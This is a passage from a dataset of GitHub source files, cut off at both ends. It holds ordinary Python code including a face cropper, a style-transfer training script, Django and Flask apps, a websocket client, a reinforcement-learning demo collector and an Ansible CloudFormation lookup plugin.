Item=relation.asdict(),\n ConditionExpression='attribute_not_exists(src)')\n\n\nif __name__ == '__main__':\n\n\n def relative_equality(one, other):\n return one.id == other.id and one.gender == other.gender \\\n and one.nickname == other.nickname \\\n and one.dob == other.dob and one.name == other.name\n\n # Create a relatives and relation table\n ddb = get_ddb()\n reset_all_tables(ddb)\n\n test = unittest.TestCase()\n\n # Add a relative\n write_relative = Relative('John Doe', '2016-01-01', 'Joe', 'male')\n add_relative(write_relative)\n\n # Read the relative back\n read_relative = get_relative_by_name(write_relative.name)[0]\n\n test.assertTrue(relative_equality(write_relative, read_relative))\n child = read_relative.id\n\n relative = Relative('Jane Doe', '1980-12-31', 'Jane', 'male')\n add_relative(relative)\n mother = relative.id\n\n # Add a relation\n add_relation(Relation(child, 'CHILD', mother, '2016-01-01'))\n add_relation(Relation(mother, 'PARENT', child, '2016-04-27'))\n\n # Get relation and verify\n child_relation = get_relatives(child)\n test.assertEqual(child_relation[mother], 'CHILD')\n","repo_name":"pashas2k3/Relative-Mapping","sub_path":"server/python_server/dynamo_layer.py","file_name":"dynamo_layer.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3437180087","text":"import mediapipe as mp\nfrom skimage import (\n transform,\n util,\n)\n\nimport config\nfrom lib.models.abstract_model import AbstractModel\n\n\ndef upscale_relative_bb(bb, alpha=0.75):\n h, w = bb.height, bb.width\n bb.xmin = max(0.0, bb.xmin - alpha * w / 2)\n bb.ymin = max(0.0, bb.ymin - alpha * h / 2)\n bb.width = min (1.0 - bb.xmin, bb.width * (1 + alpha))\n bb.height = min (1.0 - bb.ymin, bb.height * (1 + alpha))\n \n return bb\n\n\ndef crop_image_by_bb(image, bb):\n assert bb is not None, 'Bounding box is not provided'\n h, w, _ = image.shape\n cropped = util.crop(\n image,\n (\n (int(h * bb.ymin), int(h * (1 - bb.ymin - bb.height))),\n (int(w * bb.xmin), int(w * (1 - bb.xmin - bb.width))),\n (0,0)\n ),\n copy=True\n )\n return cropped\n\n\nclass FaceCropper(AbstractModel):\n def __init__(self):\n AbstractModel.__init__(self)\n\n self.mp_face_detection = mp.solutions.face_detection\n\n def apply(self, input):\n with self.mp_face_detection.FaceDetection(\n model_selection=1,\n min_detection_confidence=0.5,\n ) as face_detection:\n results = face_detection.process(input)\n\n bb = None\n \n for detection in results.detections:\n bb = upscale_relative_bb(detection.location_data.relative_bounding_box)\n\n if bb is None:\n return None\n\n cropped = crop_image_by_bb(input, bb)\n cropped = transform.resize(cropped, config.EMBEDDER_INPUT_SHAPE)\n\n return cropped\n","repo_name":"roma1n/face_clothes_matching","sub_path":"lib/models/face_cropper.py","file_name":"face_cropper.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3500623825","text":"import optparse\nimport os\nimport sys\n\nfrom common import chromium_utils\nfrom slave import slave_utils\n\n\ndef PerfTest(options):\n \"\"\"Call run-perf-tests.py, using Python from the tree.\"\"\"\n build_dir = os.path.abspath(options.build_dir)\n webkit_scripts_dir = chromium_utils.FindUpward(build_dir,\n 'third_party', 'WebKit', 'Tools', 'Scripts')\n run_perf_tests = os.path.join(webkit_scripts_dir, 'run-perf-tests')\n\n command = [run_perf_tests,\n '--time-out-ms=90000',\n '--no-results',\n '--force',\n 'inspector',\n ]\n\n command.append('--' + options.target.lower())\n\n if options.platform:\n command.extend(['--platform', options.platform])\n\n # Nuke anything that appears to be stale chrome items in the temporary\n # directory from previous test runs (i.e. from crashes or unittest leaks).\n slave_utils.RemoveChromeTemporaryFiles()\n\n # Run the the tests\n return slave_utils.RunPythonCommandInBuildDir(build_dir, options.target,\n command)\n\n\ndef main():\n option_parser = optparse.OptionParser()\n option_parser.add_option('--build-dir', default='src/out',\n help='path to main build directory (the parent of '\n 'the Release or Debug directory)')\n option_parser.add_option('--target', default='release',\n choices=['release', 'debug', 'Release', 'Debug'],\n help='DumpRenderTree build configuration (Release or Debug)')\n option_parser.add_option('--platform',\n help='Platform value passed directly to run-perf-tests.')\n options, args = option_parser.parse_args()\n if args:\n option_parser.error('Unknown argument, try --help')\n return PerfTest(options)\n\n\nif '__main__' == __name__:\n sys.exit(main())\n","repo_name":"sunny-bay/chromium30","sub_path":"build/scripts/slave/chromium/devtools_perf_test_wrapper.py","file_name":"devtools_perf_test_wrapper.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21738670586","text":"__author__ = \"Baishali Dutta\"\n__copyright__ = \"Copyright (C) 2021-2022 Baishali Dutta\"\n__license__ = \"Apache License 2.0\"\n__version__ = \"0.1\"\n\n# USAGE\n# python style_transfer.py\n\nimport os\n\nimport tensorflow as tf\nfrom pyimagesearch.nn.conv.neuralstyle import NeuralStyle\n\n# import necessary packages\nfrom config import style_transfer_config as config\n\n\ndef loadImage(imagePath):\n # specify the maximum dimension to which the image is to be\n # resized\n maxDim = 512\n\n # load the image from the given path, convert the image bytes\n # to a tensor, and convert the data type of the image\n image = tf.io.read_file(imagePath)\n image = tf.image.decode_image(image, channels=3)\n image = tf.image.convert_image_dtype(image, tf.float32)\n\n # grab the height and width of the image, cast them to floats,\n # determine the larger dimension between height and width, and\n # determine the scaling factor\n shape = tf.cast(tf.shape(image)[:-1], tf.float32)\n long_dim = max(shape)\n scale = maxDim / long_dim\n\n # scale back the new shape, cast it to an integer, resize the\n # image to the new shape, and add a batch dimension\n new_shape = tf.cast(shape * scale, tf.int32)\n image = tf.image.resize(image, new_shape)\n image = image[tf.newaxis, :]\n\n # return the resized image\n return image\n\n\n@tf.function\ndef train_one_step(image, style_targets, content_targets):\n # derive the style and content loss weight values\n style_weight = config.style_weight / len(config.style_layers)\n content_weight = config.content_weight / len(config.content_layers)\n\n # keep track of our gradients\n with tf.GradientTape() as tape:\n # run the content image through our neural style network to\n # get its features, determine the loss, and add total\n # variational loss to regularize it\n outputs = extractor(image)\n loss = extractor.styleContentLoss(outputs, style_targets,\n content_targets, style_weight, content_weight)\n loss += config.tvWeight * tf.image.total_variation(image)\n\n # grab the gradients of the loss with respect to the image and\n # apply the gradients to update the image after clipping the\n # values to [0, 1] range\n grad = tape.gradient(loss, image)\n opt.apply_gradients([(grad, image)])\n image.assign(extractor.clipPixels(image))\n\n\n# initialize the Adam optimizer\nopt = tf.optimizers.Adam(learning_rate=0.01, beta_1=0.99,\n epsilon=1e-1)\n\n# load the content and style images\nprint(\"[INFO] loading content and style images...\")\ncontent_image = loadImage(config.content_image)\nstyle_image = loadImage(config.style_image)\n\n# grab the contents layer from which feature maps will be extracted\n# along with the style layer blocks\ncontent_layers = config.content_layers\nstyle_layers = config.style_layers\n\n# initialize the our network to extract features from the style and\n# content images\nprint(\"[INFO] initializing off the extractor network...\")\nextractor = NeuralStyle(style_layers, content_layers)\n\n# extract the features from the style and content images\nstyle_targets = extractor(style_image)[\"style\"]\ncontent_targets = extractor(content_image)[\"content\"]\n\n# initialize the content image as a TensorFlow variable along with\n# the total number of steps taken in the current epoch\nprint(\"[INFO] training the style transfer model...\")\nimage = tf.Variable(content_image)\nstep = 0\n\n# loop over the number of epochs\nfor epoch in range(config.epochs):\n # loop over the number of steps in the epoch\n for i in range(config.steps_per_epoch):\n # perform a single training step, then increment our step\n # counter\n train_one_step(image, style_targets, content_targets)\n step += 1\n\n # construct the path to the intermediate resulting image (for\n # visualization purposes) and save it\n print(\"[INFO] training step: {}\".format(step))\n p = \"_\".join([str(epoch), str(i)])\n p = \"{}.png\".format(p)\n p = os.path.join(config.interm_outputs, p)\n extractor.tensorToImage(image).save(p)\n\n# save the final stylized image\nextractor.tensorToImage(image).save(config.final_image)\n","repo_name":"baishalidutta/Neural-Style","sub_path":"style_transfer.py","file_name":"style_transfer.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"45609243515","text":"\"\"\"add table users\n\nRevision ID: d104cec1a8a5\nRevises: 94410b910503\nCreate Date: 2022-04-13 21:43:12.337404\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd104cec1a8a5'\ndown_revision = '94410b910503'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table(\n 'users',\n sa.Column('uuid', sa.String, primary_key=True),\n sa.Column('nickname', sa.String, nullable=True),\n sa.Column('created_ts', sa.Integer, nullable=True),\n sa.Column('mail', sa.String, nullable=False)\n )\n\n\ndef downgrade():\n op.drop_table('users')\n","repo_name":"Ka6ah505/stocks_assistant","sub_path":"alembic/versions/d104cec1a8a5_add_table_users.py","file_name":"d104cec1a8a5_add_table_users.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39922739711","text":"from __future__ import annotations\n\nfrom typing import Any, Dict, NamedTuple, Optional, Union\n\nfrom shapely.geometry import LineString\n\n\nclass RoadId(NamedTuple):\n start: Union[int, str]\n end: Union[int, str]\n key: Union[int, str]\n\n def to_string(self) -> str:\n return f\"{self.start},{self.end},{self.key}\"\n\n def to_json(self) -> Dict[str, Any]:\n return self._asdict()\n\n @classmethod\n def from_string(cls, s: str) -> RoadId:\n start, end, key = s.split(\",\")\n return cls(start, end, key)\n\n @classmethod\n def from_json(cls, json: Dict[str, Any]) -> RoadId:\n return cls(**json)\n\n\nclass Road(NamedTuple):\n \"\"\"\n Represents a road that can be matched to;\n\n Attributes:\n road_id: The unique identifier for this road\n geom: The geometry of this road\n origin_junction_id: The unique identifier of the origin junction of this road\n destination_junction_id: The unique identifier of the destination junction of this road\n metadata: an optional dictionary for storing additional metadata\n \"\"\"\n\n road_id: RoadId\n\n geom: LineString\n metadata: Optional[dict] = None\n\n def to_dict(self) -> Dict[str, Any]:\n \"\"\"\n Convert the road to a dictionary\n \"\"\"\n d = self._asdict()\n d[\"origin_junction_id\"] = self.road_id.start\n d[\"destination_junction_id\"] = self.road_id.end\n d[\"road_key\"] = self.road_id.key\n\n return d\n\n def to_flat_dict(self) -> Dict[str, Any]:\n \"\"\"\n Convert the road to a flat dictionary\n \"\"\"\n if self.metadata is None:\n return self.to_dict()\n else:\n d = {**self.to_dict(), **self.metadata}\n del d[\"metadata\"]\n return d\n","repo_name":"NREL/mappymatch","sub_path":"mappymatch/constructs/road.py","file_name":"road.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"21"} +{"seq_id":"22774000303","text":"from rest_framework import status\nfrom rest_framework.reverse import reverse\n\nfrom resource_tracker.models import ResourceGroupTextAttributeDefinition\nfrom tests.test_resource_tracker.test_api.base_test_api import BaseTestAPI\n\n\nclass TestTextAttributeDefinitionDelete(BaseTestAPI):\n\n def setUp(self):\n super(TestTextAttributeDefinitionDelete, self).setUp()\n self.to_be_deleted_id = self.rg_physical_servers_description.id\n self.url = reverse('api_text_attribute_definition_retrieve_update_delete',\n args=[self.rg_physical_servers.id,\n self.rg_physical_servers_description.id])\n\n def test_text_attribute_definition_delete(self):\n self.assertTrue(ResourceGroupTextAttributeDefinition.objects.filter(id=self.to_be_deleted_id).exists())\n response = self.client.delete(self.url, format='json')\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertFalse(ResourceGroupTextAttributeDefinition.objects.filter(id=self.to_be_deleted_id).exists())\n\n def test_cannot_delete_text_attribute_definition_when_wrong_rg(self):\n url = reverse('api_text_attribute_definition_retrieve_update_delete',\n args=[self.rg_ocp_projects.id,\n self.rg_physical_servers_description.id])\n response = self.client.delete(url, format='json')\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n","repo_name":"EliasBoulharts/squest","sub_path":"tests/test_resource_tracker/test_api/test_resource_group_api_views/test_rg_text_attribute_definition_api_views/test_delete.py","file_name":"test_delete.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"9073499425","text":"import os\nimport time\nimport logging\nfrom collections import OrderedDict\nimport copy\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom smac.runhistory.runhistory2epm import RunHistory2EPM4Cost\nfrom smac.epm.rf_with_instances import RandomForestWithInstances\nfrom smac.utils.util_funcs import get_types\nfrom smac.tae.execute_ta_run import StatusType\n\n\nclass FeatureForwardSelector():\n \"\"\" Inspired by forward selection of ParameterImportance-package. \"\"\"\n\n def __init__(self, scenario, runhistory, to_evaluate: int=3):\n \"\"\"\n Constructor\n :parameter:\n scenario\n SMAC scenario object\n to_evaluate\n int. Indicates for how many parameters the Importance values have to be computed\n \"\"\"\n self.logger = logging.getLogger(\n self.__module__ + '.' + self.__class__.__name__)\n\n self.scenario = copy.deepcopy(scenario)\n self.cs = scenario.cs\n self.rh = runhistory\n self.to_evaluate = to_evaluate\n\n self.MAX_SAMPLES = 100000\n\n self.model = None\n\n def run(self):\n \"\"\"\n Implementation of the forward selection loop.\n Uses SMACs EPM (RF) wrt the feature space to minimize the OOB error.\n\n Returns\n -------\n feature_importance: OrderedDict\n dict_keys (first key -> most important) -> OOB error\n \"\"\"\n parameters = [p.name for p in self.scenario.cs.get_hyperparameters()]\n self.logger.debug(\"Parameters: %s\", parameters)\n\n rh2epm = RunHistory2EPM4Cost(scenario=self.scenario, num_params=len(parameters),\n success_states=[StatusType.SUCCESS,\n StatusType.CAPPED,\n StatusType.CRASHED],\n impute_censored_data=False, impute_state=None)\n\n X, y = rh2epm.transform(self.rh)\n\n # reduce sample size to speedup computation\n if X.shape[0] > self.MAX_SAMPLES:\n idx = np.random.choice(X.shape[0], size=self.MAX_SAMPLES, replace=False)\n X = X[idx, :]\n y = y[idx]\n\n self.logger.debug(\"Shape of X: %s, of y: %s, #parameters: %s, #feats: %s\",\n X.shape, y.shape,\n len(parameters),\n len(self.scenario.feature_names))\n names = copy.deepcopy(self.scenario.feature_names)\n self.logger.debug(\"Features: %s\", names)\n\n used = list(range(0, len(parameters)))\n feat_ids = {f: i for i, f in enumerate(names, len(used))}\n ids_feat = {i: f for f, i in feat_ids.items()}\n self.logger.debug(\"Used: %s\", used)\n evaluated_feature_importance = OrderedDict()\n\n types, bounds = get_types(self.scenario.cs, self.scenario.feature_array)\n\n last_error = np.inf\n\n for _round in range(self.to_evaluate): # Main Loop\n errors = []\n for f in names:\n i = feat_ids[f]\n self.logger.debug('Evaluating %s', f)\n used.append(i)\n self.logger.debug('Used features: %s',\n str([ids_feat[j] for j in used[len(parameters):]]))\n\n start = time.time()\n self._refit_model(types[sorted(used)], bounds, X[:, sorted(used)], y) # refit the model every round\n errors.append(self.model.rf.out_of_bag_error())\n used.pop()\n self.logger.debug('Refitted RF (sec %.2f; error: %.4f)' % (time.time() - start, errors[-1]))\n else:\n self.logger.debug('Evaluating None')\n start = time.time()\n self._refit_model(types[sorted(used)], bounds, X[:, sorted(used)], y) # refit the model every round\n errors.append(self.model.rf.out_of_bag_error())\n self.logger.debug('Refitted RF (sec %.2f; error: %.4f)' % (time.time() - start, errors[-1]))\n if _round == 0:\n evaluated_feature_importance['None'] = errors[-1]\n best_idx = np.argmin(errors)\n lowest_error = errors[best_idx]\n\n if best_idx == len(errors) - 1:\n self.logger.info('Best thing to do is add nothing')\n best_feature = 'None'\n # evaluated_feature_importance[best_feature] = lowest_error\n break\n elif lowest_error >= last_error:\n break\n else:\n last_error = lowest_error\n best_feature = names.pop(best_idx)\n used.append(feat_ids[best_feature])\n\n self.logger.debug('%s: %.4f' % (best_feature, lowest_error))\n evaluated_feature_importance[best_feature] = lowest_error\n\n self.logger.debug(evaluated_feature_importance)\n self.evaluated_feature_importance = evaluated_feature_importance\n return evaluated_feature_importance\n\n def _refit_model(self, types, bounds, X, y):\n \"\"\"\n Easily allows for refitting of the model.\n\n Parameters\n ----------\n types: list\n SMAC EPM types\n X:ndarray\n X matrix\n y:ndarray\n corresponding y vector\n \"\"\"\n # take at most 80% of the data per split to ensure enough data for oob error\n self.model = RandomForestWithInstances(types=types, bounds=bounds, do_bootstrapping=True,\n n_points_per_tree=int(X.shape[1]*0.8))\n self.model.rf_opts.compute_oob_error = True\n self.model.train(X, y)\n\n def _plot_result(self, output_fn, bar=True):\n \"\"\"\n plot oob score as bar charts\n Parameters\n ----------\n name\n file name to save plot\n \"\"\"\n\n fig, ax = plt.subplots()\n features = list(self.evaluated_feature_importance.keys())\n errors = list(self.evaluated_feature_importance.values())\n max_to_plot = min(len(errors), 5)\n\n ind = np.arange(len(errors))\n if bar:\n ax.bar(ind, errors, color=(0.25, 0.25, 0.45))\n else:\n ax.plot(ind, errors, lw=4, color=(0.125, 0.125, 0.125))\n\n ax.set_ylabel('error', size='24', family='sans-serif')\n if bar:\n ax.set_xticks(ind)\n ax.set_xlim(-.5, max_to_plot - 0.5)\n else:\n ax.set_xticks(ind)\n ax.set_xlim(0, max_to_plot - 1)\n ax.set_xticklabels(features, rotation=30, ha='right', size='10',\n family='monospace')\n ax.xaxis.grid(True)\n ax.yaxis.grid(True)\n\n plt.tight_layout()\n\n out_dir = os.path.dirname(output_fn)\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n fig.savefig(output_fn)\n return output_fn\n\n def plot_result(self, output_fn=None):\n plot_paths = []\n plot_paths.append(\n self._plot_result(output_fn + '-barplot.png', True))\n plot_paths.append(\n self._plot_result(output_fn + '-chng.png', False))\n plt.close('all')\n self.logger.debug('Saved plot as %s-[barplot|chng].png' % output_fn)\n return plot_paths\n","repo_name":"timothyyu/ml_monorepo","sub_path":"CAVE/cave/feature_analysis/feature_imp.py","file_name":"feature_imp.py","file_ext":"py","file_size_in_byte":7297,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"21"} +{"seq_id":"32131498856","text":"import asyncio\nimport json\nimport os\nimport sys\n\nimport websockets\nfrom aioconsole import ainput\n\nimport global_config\n\n\nclass Runner:\n def __init__(self):\n self.websocket = None\n self.have_orders = False\n self.input_type = 'bouquet_design'\n self.reader = None\n\n @property\n def input_type_input_prefix_map(self):\n map_ = dict(\n bouquet_design='Enter a bouquet design or empty line',\n flower='Enter a flower'\n )\n return map_\n\n @property\n def input_type(self):\n return self.__input_type\n\n @input_type.setter\n def input_type(self, i_type: str):\n assert i_type in ('bouquet_design', 'flower')\n self.__input_type = i_type\n\n async def send_client_input(self):\n while True:\n input_prefix = self.input_type_input_prefix_map[self.input_type]\n\n if len(sys.argv) > 1:\n test_file_name = sys.argv[1]\n test_file_path = os.path.join(os.getcwd(), test_file_name)\n for client_input in self.test_file_reader(test_file_path):\n if client_input.strip() == 'stop':\n await asyncio.sleep(999999)\n\n self.have_orders = True\n jsn = json.dumps({'type': self.input_type, 'payload': client_input.strip()})\n\n if not client_input.strip() and self.have_orders:\n self.input_type = 'flower'\n\n await self.websocket.send(jsn)\n\n else:\n client_input = await ainput(f\"{input_prefix}: \")\n\n if not client_input.strip() and self.have_orders:\n self.input_type = 'flower'\n\n self.have_orders = True\n jsn = json.dumps({'type': self.input_type, 'payload': client_input})\n await self.websocket.send(jsn)\n\n async def read_server_response(self):\n while True:\n msg = await self.websocket.recv()\n if msg == 'close':\n await self.websocket.disconnect()\n elif 'all orders completed' in msg.lower():\n self.input_type = 'bouquet_design'\n self.have_orders = False\n print(f\"\\n{msg}\")\n\n async def run(self):\n uri = f\"ws://{global_config.PROD_LINE_HOST_NAME}:{global_config.PROD_LINE_PORT}/{global_config.PROD_LINE_URL}\"\n\n async with websockets.connect(uri) as websocket:\n self.websocket = websocket\n await asyncio.gather(\n self.send_client_input(),\n self.read_server_response(),\n return_exceptions=True,\n )\n\n @staticmethod\n def test_file_reader(file):\n with open(file) as f:\n for line in f.readlines():\n yield line\n\n\nif __name__ == '__main__':\n runner = Runner()\n\n try:\n asyncio.run(runner.run())\n except KeyboardInterrupt:\n exit(1)\n","repo_name":"E1Adamov/bouquet_production_line","sub_path":"cli_client.py","file_name":"cli_client.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74618405813","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.logsHome, name='logsHome'),\n url(r'^accessLogs', views.accessLogs, name='accessLogs'),\n url(r'^errorLogs', views.errorLogs, name='errorLogs'),\n url(r'^emaillogs', views.emailLogs, name='emaillogs'),\n url(r'^ftplogs', views.ftplogs, name='ftplogs'),\n url(r'^modSecAuditLogs', views.modSecAuditLogs, name='modSecAuditLogs'),\n url(r'^getLogsFromFile',views.getLogsFromFile, name=\"getLogsFromFile\"),\n url(r'^clearLogFile',views.clearLogFile, name=\"clearLogFile\"),\n url(r'^serverMail$', views.serverMail, name=\"serverMail\"),\n url(r'^saveSMTPSettings$', views.saveSMTPSettings, name=\"saveSMTPSettings\"),\n]","repo_name":"usmannasir/cyberpanel","sub_path":"serverLogs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":1302,"dataset":"github-code","pt":"21"} +{"seq_id":"36467665879","text":"from django.conf.urls import url\r\n\r\nfrom . import views\r\n\r\nurlpatterns = [\r\n url(r'^$', views.index_view, name='index'),\r\n url(r'^register/', views.register_view, name='register'),\r\n url(r'^do_register/', views.do_register_aciton, name='do_register'),\r\n url(r'^username_check/', views.username_check_aciton, name='username_check'),\r\n url(r'^register_suc/', views.register_suc_view, name='register_suc'),\r\n url(r'^register_fail/', views.register_fail_view, name='register_fail'),\r\n url(r'^do_logout/', views.do_logout_aciton, name='do_logout'),\r\n url(r'^login', views.login_view, name='login'),\r\n url(r'^do_login/', views.do_login_aciton, name='do_login'), \r\n]","repo_name":"yangruihan/yrh_website","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"73262873653","text":"import joblib\r\nfrom flask import Flask, render_template, request\r\nfrom helpers.dummies import *\r\n\r\n\r\napp = Flask(__name__)\r\nmodel = joblib.load('model3.h5')\r\nscaler = joblib.load('scaler3.h5')\r\n\r\n\r\n# weather = ['mist', 'rainy', 'snowy']\r\n# weather_dummies = [0 for i in range(3)]\r\n# try:\r\n# idx = weather.index(request.args['weather'])\r\n# weather_dummies[idx] = 1\r\n# except:\r\n# pass\r\n\r\n\r\n\r\n@app.route('/',methods=['GET'])\r\ndef home():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/predict',methods=['GET'])\r\ndef predict():\r\n ''''\r\n data = [\r\n float(request.args['temp']),\r\n float(request.args['humidity']),\r\n int(request.args['hour']),\r\n int(request.args['is_rush_hour']),\r\n int(request.args['month'])\r\n ]\r\n '''\r\n\r\n data = [\r\n float(request.args['Gender']),\r\n float(request.args['Married']),\r\n float(request.args['Education']),\r\n float(request.args['Self_Employed']),\r\n int(request.args['ApplicantIncome']),\r\n int(request.args['CoapplicantIncome']),\r\n int(request.args['LoanAmount']),\r\n int(request.args['Loan_Amount_Term']),\r\n int(request.args['Credit_History'])\r\n ]\r\n\r\n data += Dependents_dummies[request.args['Dependents']]\r\n\r\n data += Property_Area_dummies[request.args['Property_Area']]\r\n\r\n prediction = round(model.predict(scaler.transform([data]))[0])\r\n x=\" \"\r\n if prediction ==1:\r\n x=\"able\"\r\n else:\r\n x=\" not able\"\r\n\r\n return render_template('index.html', prediction_text='The customer is {} to repay the loan '.format(x))\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)","repo_name":"Eman104/loan-classification","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5778591056","text":"# 125. Valid Palindrome\n#\n# A phrase is a palindrome if, after converting all uppercase letters into\n# lowercase letters and removing all non-alphanumeric characters, it reads the\n# same forward and backward. Alphanumeric characters include letters and\n# numbers.\n# Given a string s, return true if it is a palindrome, or false otherwise.\n\nimport re\n\nexample1_arg1 = \"A man, a plan, a canal: Panama\"\nexample1_out = True\n\nexample2_arg1 = \"race a car\"\nexample2_out = False\n\nexample3_arg1 = \" \"\nexample3_out = True\n\n\nclass Solution:\n def isPalindrome(self, s: str) -> bool:\n lower = s.lower()\n # print(lower)\n pattern = re.compile('[^a-zA-Z0-9]')\n alphanum_lower = re.sub(pattern, '', lower)\n # print(alphanum_lower)\n if alphanum_lower == alphanum_lower[::-1]:\n return True\n else:\n return False\n\n\nprint(Solution().isPalindrome(example1_arg1) == example1_out)\nprint(Solution().isPalindrome(example2_arg1) == example2_out)\nprint(Solution().isPalindrome(example3_arg1) == example3_out)\n","repo_name":"jowls/challenges","sub_path":"leetcode/python/125.py","file_name":"125.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4627177083","text":"import logging\nimport os\n\nimport chainer\n\n\ndef collect_demonstrations(agent,\n env,\n steps,\n episodes,\n outdir,\n max_episode_len=None,\n logger=None):\n \"\"\"Collects demonstrations from an agent and writes them to a file.\n\n Args:\n agent: Agent from which demonstrations are collected.\n env: Environment in which the agent produces demonstrations.\n steps (int): Number of total time steps to collect demonstrations for.\n episodes (int): Number of total episodes to collect demonstrations for.\n outdir (str): Path to the directory to output demonstrations.\n max_episode_len (int): Maximum episode length.\n logger (logging.Logger): Logger used in this function.\n \"\"\"\n assert (steps is None) != (episodes is None)\n logger = logger or logging.getLogger(__name__)\n\n with chainer.datasets.open_pickle_dataset_writer(\n os.path.join(outdir, \"demos.pickle\")) as dataset:\n # o_0, r_0\n terminate = False # True if we should stop collecting demos\n timestep = 0 # number of timesteps of demos collected\n episode_num = 0 # number of episodes of demos collected\n episode_len = 0 # length of most recent episode\n reset = True # whether to reset environment\n episode_r = 0 # Episode reward\n while not terminate:\n if reset:\n if episode_num > 0:\n logger.info('demonstration episode %s length:%s R:%s',\n episode_num, episode_len, episode_r)\n obs = env.reset()\n done = False\n r = 0\n episode_r = 0\n episode_len = 0\n info = {}\n # a_t\n a = agent.act(obs)\n # o_{t+1}, r_{t+1}\n new_obs, r, done, info = env.step(a)\n # o_t, a_t, r__{t+1}, o_{t+1}\n dataset.write((obs, a, r, new_obs, done, info))\n obs = new_obs\n reset = (done or episode_len == max_episode_len\n or info.get('needs_reset', False))\n timestep += 1\n episode_len += 1\n episode_r += r\n episode_num = episode_num + 1 if reset else episode_num\n if steps is None:\n terminate = episode_num >= episodes\n else:\n terminate = timestep >= steps\n if reset or terminate:\n agent.stop_episode()\n if terminate:\n # log final episode\n logger.info('demonstration episode %s length:%s R:%s',\n episode_num, episode_len, episode_r)\n","repo_name":"chainer/chainerrl","sub_path":"chainerrl/experiments/collect_demos.py","file_name":"collect_demos.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":1134,"dataset":"github-code","pt":"21"} +{"seq_id":"6923500872","text":"# (c) 2014, Dean Wilson \r\n#\r\n# Ansible is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# Ansible is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with Ansible. If not, see .\r\n\r\nfrom ansible import utils, errors\r\n\r\ntry:\r\n import boto\r\n import boto.cloudformation\r\nexcept ImportError:\r\n raise errors.AnsibleError(\r\n \"Can't LOOKUP(cloudformation): module boto is not installed\")\r\n\r\n\r\nclass Cloudformation(object):\r\n\r\n def __init__(self, region, stack_name):\r\n self.region = region\r\n self.stack_name = stack_name\r\n\r\n def get_output(self, key):\r\n conn = boto.cloudformation.connect_to_region(self.region)\r\n stack = conn.describe_stacks(stack_name_or_id=self.stack_name)[0]\r\n value = [output.value for output in stack.outputs if output.key == key]\r\n\r\n return value\r\n\r\n\r\nclass LookupModule(object):\r\n\r\n def __init__(self, basedir=None, **kwargs):\r\n self.basedir = basedir\r\n\r\n def run(self, terms, inject=None, **kwargs):\r\n region, stack, value_type, key = terms.split('/')\r\n\r\n self.cfn = Cloudformation(region, stack)\r\n\r\n value = False\r\n if value_type == 'output':\r\n value = self.cfn.get_output(key)\r\n\r\n return value\r\n","repo_name":"omarlari/ansibleCloudformation","sub_path":"plugins/lookup_plugins/cloudformation.py","file_name":"cloudformation.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"17726731783","text":"import tkinter as tk\nfrom Subject import Subject\n\n\nclass SubjectLabel(tk.Label):\n\n def __init__(self,Frame,lecText,tutText=None):\n self.cd , self.dy , self.stH , self.stM , self.enH , self.enM = lecText.split(\",\")\n if not (tutText == None):\n #splitting string\n self.dy1 , self.stH1 , self.stM1 , self.enH1 , self.enM1 = tutText.split(\",\")\n\n #intializing Subject object\n self.SubObj = Subject(self.cd , self.dy , int(self.stH) , int(self.stM) , int(self.enH) , int(self.enM)\n ,Subject(self.cd, self.dy1 , int(self.stH1) , int(self.stM1) , int(self.enH1) , int(self.enM1)))\n\n #intializing Subejct Label\n self.SubLabel = tk.Label(Frame, text 